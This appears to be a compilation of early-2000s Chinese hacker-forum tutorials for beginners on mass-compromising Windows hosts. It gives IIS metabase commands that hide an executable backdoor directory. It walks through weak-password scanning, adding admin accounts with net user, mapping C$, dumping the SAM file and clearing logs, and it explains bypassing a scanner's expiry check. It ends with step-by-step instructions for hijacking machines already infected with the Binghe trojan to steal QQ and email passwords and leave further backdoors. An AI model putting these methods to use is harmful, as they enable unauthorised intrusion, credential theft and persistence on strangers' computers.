3. mkdir c:\inetpub\wwwroot\dir1 
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:\inetpub\wwwroot\dir1" 
这样就建好了一个虚目录：Virtual Dir1 
你可以用 1 的命令看一下 
5. 接下来要改变一下Virtual Dir1的属性为execute 
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s: 
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s: 
现在你已经可以upload 内容到该目录，并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。

6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process

Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false

注释：cscript windows script host.

adsutil.vbs windows iis administration script

后面是 iis metabase path

这样的后门几乎是无法查出来的，除非把所有的虚目录察看一遍（如果管理员写好了遗书，那他就去查吧）

大家不可以用来做非法的攻击，一切后果自负
入门者如何获得肉鸡

入门者如何获取肉鸡（跳板） 

入门者如何获取肉鸡（跳板）
今天我们来讲一讲一些简单的入侵，这篇文章是送给新手的，难的文章我也写不出来~~ 这里讲的方法都是针对winnt和2000的，平台是2000。我只是想送给新手点肉鸡罢了。

罗嗦了这么多，现在我们开始吧~。首先我们来对几个扫描器评点一下什么？你不知道扫描器是什么？我晕~~~扫描器就是扫描的嘛，它可以检测出主机的漏洞！ 
常见的有端口扫描器，和cgi漏洞扫描器，还有就是象流光那样的大型扫描器，什么都可以扫。我们先来讲一下扫描器的原理！ 
现在假设你是A，要扫的是B 
那么，通常建立3次握手的过程是 
A--------Syn------->B 
A<-----Syn/Ack------B 
A-------Ack-------->B 
这样就建立了连接,扫描就是建立很多这样的,从而达到了解对方开了哪些端口,哪些服务厉害的扫描器还会进一步探测!但是,这种tcp扫描会留下大量的记录,如果B的网管不是注意文明用语那么他就会开始注意你了!! 
所以我们又会用半开放式扫描(syn) 
也就是 
A--------Syn------->B 
A<-----Syn/Ack------B 
A------->\\ B 
A-connected--?<-----B 
这样,由于B一直得不到确认,当然就不会记录ip啦,不过B若是很bt,那么他也会记录任何syn的 ip,那就没办法了!!

扫描的原理讲完了,现在来讲讲几个扫描的工具!!这才是重点,新手哪会关心

那原理啊~~~ 我们先来讲端口扫描器一个端口就是一条路,进入系统的的路!可见他的重要!! 
我推荐用superscan和nscan两个都是国外的,superscan的汉化版有问题,建议去www,peckerland.com下载E文版
nscan在黑白有下! 这两个的界面简单,我就不罗嗦了!我很喜欢superscan.他的扫描准且快~~对单一端口的大规模扫描也很不错,以前大家就是用它来扫3389的!

下面我来介绍流光!!xscan!!和sss!!! 我想大家对流光应该不陌生吧!如果你是新手,先从流光开始!!界面很cool!多亏榕哥~~不过我宁可把流光作为一个攻击的工具而不是扫描的工具xscan则是安全焦点的,他可以半开放式扫描!! 
而且在扫描上我觉得比流光好!因为我问过sharkstorm,他说流光会在对方主机上留下痕迹,所以我怀疑流光用的是tcp扫描! 所以我现在用大规模扫描时是用xscan而不是流光! 接下来是sss,现在的最新版是3.43,在www.peckerland.com上有3.41版和注册机. 
他是由redshadow开发的,全称shadow security scanner他能扫描很多漏洞,速度也很快,留下的痕迹少,产生报告详细.有时候流光或是国内一些扫描器会误报,这时我常用他来检测.所以,在入侵单一机器时,我用的就是它!!!! 
好累啊,先喝口茶~~~下面就讲怎样获得大量肉鸡! 这里我推荐用扫描nt弱口令的方法! 当然也许别人会推荐扫描sql的弱口令,但网上的nt弱口令真的比sa为空的要多太多了~~ 我们先打开流光4->扫描->简单扫描->nt/98->IP段开始扫,扫到很多139开了的主机然后ipc主机,右键->探测->远程探测用户然后就会有很多用户和共享被扫出来,其中有可能包括弱口令(参见杀手的流光教程)这里我告诉大家一个秘诀,就是有很多是guest为admin权限的,这些的密码一般为空这是因为这台主机被攻破过,有人留下了后门,这下便宜我们了,先拿来用了再说! 
前面我们说过,我不喜欢用流光来扫描,所以,我们在这里用xscan来扫描nt弱口令! 在扫描选项里选nt弱口令,然后来个ip范围,让他扫,接下来就可以等待战果了一般会很丰硕,我每次扫这个都很爽!!! 接下来就要讲怎么用了!前面提到过我喜欢用流光来攻击,现在就让我们看看他的强大!! 流光4->工具->nt/iis工具->nt远程管道命令输入ip,刚才扫到的用户名,密码(若为空则不填) 连接! 
ntcmd>net user 
看看,连上了吧~~ 
我们来添加一个用户名 
ntcmd>net user aaa 123 /add 
命令成功完成

加到administrators组 
ntcmd>net localgroup administrators aaa /add 
命令成功完成

好了,这样肉鸡就做好了.什么?你想把他作成跳板? 好的,我们继续来 
流光4->工具->nt/iis工具->ipc种植者 
添上ip,用户名,密码等 
然后点开始 
接下来我们再用telnet连上去,去debug snake的sksockserver注意，用ntcmd

不能安装sksockserver。 
具体我就不说了,大家自己参考说明.

当然,大家也可以放一堆后门上去. 
不过我喜欢这样 
ntcmd>net use g: \\ip\c$ 
命令成功完成

这样,我们就把他的c盘映射成了我的g盘。然后我再放个木马的server上去再用ntcmd运行,呵呵搞定~~,玩他没商量!!! 
我们还可以把c;\winnt\repair\sam._抓下来,用lc3跑一下 就得到所有用户的密码,或是用木马抓密码!! 
当然我们也可以telnet上去运行tlntadmn来修改telnet端口，更隐蔽怎么扩大战果呢?我们仍用ntcmd 
ntcmd>net view 
...... 
出来很多机器名,这是和我们的肉鸡共享的 
比如有一台是 
\\LOVE 
我们就 
ntcmd>ping -a LOVE 
这样就得到了他的ip 
我一般会用sss再扫一次 
当然,你也可以用你得到的密码去试试,看能不能进去,呵呵

有一次,我"不小心"跑到某教育部门,net view一下,居然和教育局挂钩....接下来出于自身安全,我就停住了,呵呵,中国的政府不能乱搞的~~~

最后是打扫脚印,建议用小榕的cleaniislog,很方便,用法参见说明! 请记住,入侵nt的首选绝对是139,netbios

补充一点,大家在连接时可以用2000自带的计算机管理->连接到计算机这样也很方便.

关于其他几种方法，我在这里说明一下

输入法基本上绝种了~~ 不过如果你扫大量的肉鸡也许还有最好用的应该数sql的sa为空，直接用流光连就行了，连上后就可以直接添加帐号等，但是有一点不好有时候会连不上。比如我在学校机房就从来没连上过，估计是我在内部网络，有硬防火墙的原因，我在3389上就连的很好。不过总是玩这个是不会提高的！其次要说明的就是idq溢出与.printer的漏洞，这两个漏洞我不想多说什么，因为很多人都会用但成功不了，我在这里就说说什么情况下可以成功。一般来说，用xscan扫描，如果出现说isapi扩展，那么恭喜你，如果存在这两个漏洞绝对成功，我屡试不爽。因为这两个漏洞都与iis那个破东西息息相关，所以大家不要被别的扫描器的误报迷惑，在安焦的漏洞库有这两个漏洞的详细说明。

关于unicode漏洞请参见ncc写的教程

流光是一个很好的攻击工具,他的exploits文件夹和tools文件夹的东西大家漫漫体会,呵呵。不说了,不然天下大乱了!!

总之,98的安全性比2000好,因为98基本上没用 一般来说,入侵98是从139,要改自己的lmhosts文件来达到入侵的目的! 不过我劝新手不要沉迷在我讲的方法中,虽然你能从中的到很多肉鸡,但是绝对不要做简单重复的工作 当有了一定水平后要去玩linux,unix,不然水平不会提高. 我写这篇文章的目的是让大家学习,请不要破坏,若是因此引起的一切后果本人概不负责!!

流光的使用方法

窍门一:

1.很多人都有使用流光4.71之前版本的经验,不过现在请下载流光5.0内部测试版.地址:

http://www.netXeyes.com 安全焦点

http://www.swed.com.tw/xiaonu/f.rar 小奴私人下载

下载后解压安装! 解压密码在说明文件里..
(强烈建议查看readme文档再安装撒...)

安装后打上时间补丁...请把补丁放在同一个文件夹里.

2.如果没有安装时间补丁一打开流光就会出现:"[流光5.0]已过期,请到http://www.netXeyes.com下载最新版本"

3.如果安装了时间补丁,你可以打开5.0.但是还是会出现"[流光5.0]已过期,请到http://www.netXeyes.com下载最新版本"...这时我们就要用到特别的方法来防止流光5.0过期了...

4.(仔细..再仔细)如果你有金山网标或者天网之类的防火墙的话...恭喜你.你就快成功了..小榕设计流光5.0内部测试版的时候会让打开主程序就会自动访问四个IP地址.
第一个是61.166.33.214 -- 云南省 楚雄市
第二个是218.30.12.185 -- 陕西省 西安市 (可能会变)
第三个是61.166.33.214                  (跟第一个一样)
第四个是66.94.230.45  -- 美国(可能会变..这个很"阴险"大概在前面三个IP过后20秒左右它才出现)

防火墙首先禁止前面四个IP连接.(直接点击禁止就可以了)...

四个IP过后随便你扫什么都不会有限制.如果这时防火墙询问你是不是允许流光5.0访问**.**.**.**(ip)??   当然点击允许啦...要不怎么扫??

4.流光5.0增强了SENSOR的扫描属性.很强大...特别是"TELNET ip 控制端口"和数据包转发功能我佩服得7体投地...自带有说明文件.大家看看就知道了.(我在这里就不废话了撒...呼呼)
_________________________________

窍门二:

还有一个比较"失败"的方法.打开补了丁的流光之前首先关闭网络连接,即不要上网.过1分钟以后再打开网络连接...这时你就可以无忧用5.0了..(这样做是防止一开流光5.0就访问指定IP)
_________________________________

窍门三:

听"新丁"(我在黑基的兄弟)说更改流光的图标也可以防止过期提示,我没试过.大家试试..
_________________________________

TNND...酒气冲头.难受死了...坚持搞完..
_________________________________

友情提醒:

1.如果你是天网防火墙请把"属性设置"--"自动允许每个程序运行并记录日志"(好像是这样吧)的勾去掉...这样就可以拦截流光运行时访问的IP地址了..

2.流光5.0由于是内部测试版本,所以不限制国内IP扫描.请千万不要!不要!!不要!!!扫国内IP!尽量多种植SENSOR到你的外国肉鸡上帮你扫撒....(呼呼,我最喜欢做的事)

3.流光5.0太强大.扫描的IP段尽可能少点...这个版本中包含了工具ARP Netwok Sniffer,这是一个基于ARP SPOOF的工具，有可能会造成目标网络出现故障甚至于中断，在使用的时候不要指定过于大的IP范围。推荐不要超过32台主机。--- 引用

不要把自己的机子都搞死了!同时尽量不要使用"网络嗅探"功能.  "要知道在一个100M的环境中的流量是非常大的，所以请首先确定您自己的主机是否有足够的带宽接收传输数据" --- 引用!

___________________________________

某些醉话...

1.很多人扫描的时候会扫到用户:root:空 admin:同 administrator:同 wwwadmin:同 等同时存在于一个IP的现象.但是建立IPC连接的时候却失败.

注意:这些是虚报...请你点击"选项(o)"---"IPC用户列表选项(I)"----把"如果主机不允许列出用户则强制从以下文件导入"的选项去掉...这样你扫描出来的用户就不会虚报了...

2.扫描的时候要注意时间...要想到国外的时间跟我们有差异...如果你特别喜欢在我们的下午4点扫美国的IP段...那我没话可说!

3.不要扫描自己不会利用的漏洞和端口...反正自己不会用,扫又浪费时间...(如果你打算学习怎么利用...那鼓励你扫!)

4.流光的综合性很强!注意看每一项选项内容,自己摸索更好的综合扫描办法,....

玩木马

如果你是高手，看了这篇文章你会觉得无聊，如果你是菜鸟（和我一样菜的话）或者会有点用。哪个人不爱玩？给我站出来！我要狠狠的KKKKK他一顿。5555.........好了，闲话少说为好，转入正题吧。首先我用到的工具主要是两个，1.扫描工具：代理猎手，2.冰河2.2客户端。（哪里有下载？自己找吧）下面分两步走：
一.扫描篇：
双击桌面上的代理猎手快捷图标，进入代理猎手主操作台.点击左上角三角形下面的“搜索任务”，点击下面的“添加任务”，进入“添加搜索任务”窗口，任务类型选“搜索网址范围”，按“下一步”，进入地址范围窗口，接着按右边的“添加”，在弹出的窗口中，地址范围类型选“起止地址范围”，起止地址填上你要扫描的IP段（例如61.150.0.0）结束地址填上例如（61.150.255.255），按“确定”，见到我刚才填的IP段出现在窗口中。接着按“下一步”，进入端口和协议窗口，按右边的“添加”，在弹出的小窗口中选“单一端口”，下面数字框中填上冰河的默认端口7626协议选“HTTP”，在旁边的“必搜”前打上钩。按“确定”，就看到了我刚才填的端口和协议出现在窗口中，按“完成”，这时回到添加前的窗口。看到框框中已有了我刚才填的内容 ，左上角的三角形也由开始的灰色变了现在的蓝色，这时按下这个三角形就开始了我的第一次搜索任务（这时操作台下面的数字会不停的跳动，表示正搜索中），这时按下红色停止按钮下面的“搜索结果”按钮，就看到了搜索的结果，如果有端口7626开的机器扫到，就会在窗口中显示该机的IP地址，(验证超时那些先不要理它,反正它的端口7626是打开了),如果你选IP段好运的话，很快就会有机器被你扫描到！你不仿等到扫描到的机器有多几个时才停止扫描，这样你进别人的机器跳舞的机会就大大提高了！如果你真的那么倒霉扫不到的话，就换IP段来搜吧.不过要记住把先前的搜索任务删除掉再添加新的搜这里有一点要告诉你，代理猎手的其他设置你先不要搞（其余都是默认的），就按我上面提到的做就行了！好了，扫描到了一大堆的IP了，GO GO GO 进入主要的一步了。。。。。

二。连接篇:
运行冰河2.2客户端,进入操作台,点击左上角"添加主机"按钮,在弹出的窗口中,显示名称处填上我刚才扫描到的IP,密码先不填,端口填默认的7626.按"确定",这时看到了填入的IP出现在主操作台左边的窗口中了.重复上面的这一步,把扫描到的IP全部都填进去(省去了等一下连接一个填一次的麻烦),看到了所有的IP都填进去后,就开始了我们的第一次入侵(这里有一点要提醒一下的是,你在连接前一定要把你的防火墙和病毒监控关了).好了,双击操作台左边看到的IP,下面的状态条会滚动,等待一下,看看返回来什么信息.如果是"主机没有响应"或者"无法与主机连接",试多几次,还是一样的话,可能对方已离线或打开7626端口的不是冰河的服务端,就选下一个IP.好了,这个能连接,但返回的信息是"口令有误..."那这个我可以搞店了,先试冰河的通用密码,具体操作如下:右键点击该IP,在弹出菜单中选"修改",进入刚才添加IP的窗口,在"访问口令"处填上你所选的通用密码,按"确定".再到主操作台上"当前连接"的下拉菜单中找到你刚才修改了口令的IP,点击一下,看到"访问口令"处出现了多个"*******"号,这就是你填上的冰河通用密码了,再按一下旁边的"应用",再双击操作台左边该IP,就尝试再次连接,当看到"正在接收数据""完成"等字样时,呵呵,你已成功了.这部机你有了一切的操纵权了.看到了他的机器的分盘(C.D.E.F.G.等)在右边的屏幕中出现了,双击这个小图标,你就可以看到他的硬盘中的文件夹列表和文件,再通过用鼠标右键点击文件夹或文件,你就可以使用"复制","粘贴",删除","下载"等等功能了,你也可以上传一个文件给他远程打开,呵呵.如果你上传的是另一个木马,那他的机就又多中了一个马儿了..具体做什么自己想吧.去看看他在干什么吧,点击操作台上方"查看屏幕"按钮,图象格式处选"JPEG",(因为JPEG图象传输速度比BMP的传输速度要快),按确定,等一下一个小的屏幕就出来啦,这个就是对方的屏幕画面了,右键点击该小屏幕,在"自动跟踪"和"自动缩放"前打上钩,那么这个小屏幕就会跟随对方的屏幕变化而变化了.再去点击"命令控制台",看到各个命令类按钮,双击各个按钮会有不同的命令出了,你可以在"口令类命令"下的"历史口令"处查看他的QQ密码,上网密码等等,在"设置类命令"下的"服务器配置"中读取该冰河服务端的配置信息,也就是刚才阻档你连接的设置了的密码,要是对方有设置IP邮寄的话你也可以看到他的信箱号,用这个密码你或许能破了他的信箱(我用这个方法也真的破了好几个人的信箱哦,呵呵),你也可以修改了他的配置,换了你自己的密码和邮寄信箱.你也可以帮他的硬盘创建共享.以后他把冰河杀了你也可以用共享连接他啊!(等于给自己多留了个后门)其他功能就不说了,你自己慢慢去尝试吧!
还有一种情况,就是你尝试了所有的通用密码都不能连接的话,就试试小飞刀原创的冰河漏洞吧,具体操作如下:当你用完了通用密码后还是显示"密码有误......",就去点击操作台窗口中的"我的电脑",在你的文件中找到你的冰河服务端,右键点选"远程打开",这时你依然看到是"密码有误....",但马上又多了一条传输进度条出来,显示正在传送文件,当看到了进度条完成后,下面的提示也变了,会显示"文件传送完毕"和"文件打开成功".这样你就可以不用密码连接进去了.(记住要先把你刚才填进去的密码删了,按"应用".当返回的信息是"文件传送完毕"和"文件打开失败"时,你可以上传其他的木马服务端(例如黑洞,公牛等等木马都可以)上去,这样也可以控制对方,但已不是用冰河客户端了,而是换了相对应的木马客户端.
咳咳........进去后可别干坏事哦!

其实玩了这么多的木马还是觉得冰河是再好用的